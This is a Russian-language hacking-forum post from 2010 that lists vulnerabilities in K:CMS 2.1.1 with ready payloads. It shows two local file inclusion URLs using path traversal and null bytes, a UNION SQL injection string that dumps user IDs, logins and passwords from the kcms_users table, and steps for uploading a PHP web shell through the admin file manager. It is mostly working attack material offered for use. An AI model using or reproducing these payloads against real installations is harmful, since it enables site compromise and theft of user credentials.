05.07.2010, 17:58
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Product: K:CMS
Version: 2.1.1
Download: www.kcms.cz
LFI
Need: mq=off
file: install.php (!!!)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]])) {
include[/COLOR][COLOR="#DD0000"]"languages/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"lang"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
result:
Код:
Code:
/install.php?lang=../../../[local_file]%00
LFI
Need: mq=off, admin account
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"function"[/COLOR][COLOR="#007700"]])) {
include[/COLOR][COLOR="#DD0000"]"components/pages_admin/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"function"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
result:
Код:
Code:
/admin.php?function=../../../[local_file]%00
SQL-Injection
Need: mq=off
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id, login, rights, mail, regdate, lastvisit, realname, age, jabber, skype, msn, about, sign, icq, avatar FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_USERS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"profile"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$item[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
result:
Код:
Code:
/index.php?profile=-qwerty'+union+select+1,concat_ws(0x3a,id,login,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+kcms_users+--+
Upload ShellCode
Need: admin account
Заходим admin.php?function=files . Выбираем шелл, загружаем. Шелл будет доступен по адресу files/shell.php .
Никаких проверок на расширение
|
|
|